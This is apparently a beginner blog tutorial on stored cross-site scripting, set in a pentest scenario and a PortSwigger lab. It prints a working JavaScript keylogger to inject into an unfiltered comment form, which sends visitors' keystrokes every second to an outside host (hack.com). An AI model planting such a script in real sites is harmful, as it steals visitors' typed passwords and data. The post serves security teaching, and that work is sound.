XSS Vulnerability Part 2

Greetings, hackers! In first part we covered those topics, such as what is XSS? and simple example of reflected XSS attack. In this article we will talk about stored XSS.

What is Stored XSS?

Stored XSS occurs when an unvalidated web application includes data in its subsequent HTTP responses and stores it in a database, for example. Let’s imagine a programmer’s blog where you can leave a comment under each article, but since our programmer is not a professional, he forgot to filter the comments. We, as pentesters from whom a programmer orders a penetration test, are trying to find an XSS vulnerability. Having entered the page, we see that we have such a beautiful form for comments, let’s put the keylogger there.

keylogger.js :

var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://hack.com/keylogger.php?c='+keys;
keys = '';
}, 1000);

Now everyone who visits this site will fall for the keylogger.

Okay, enough fantasizing, let’s apply payloads to forms ourselves. We will try on the lab from PortSwigger.

Initially, we see a simple blog page with different articles. We need an input form.

On the post page, we can see that we have a comment form.

From the task condition, we learn that we need to display alert(). However if you use Chrome, from version 92 onward (July 20th, 2021), cross-origin iframes are prevented from calling alert(), so we can use print() instead.

We receive confirmation that our comment has been successfully submitted. The lab is already solved, but let’s try to return to the page.

We get an alert message.

The examples are very simple, just for beginners. In the next part, we will cover more advanced topics. Thank you!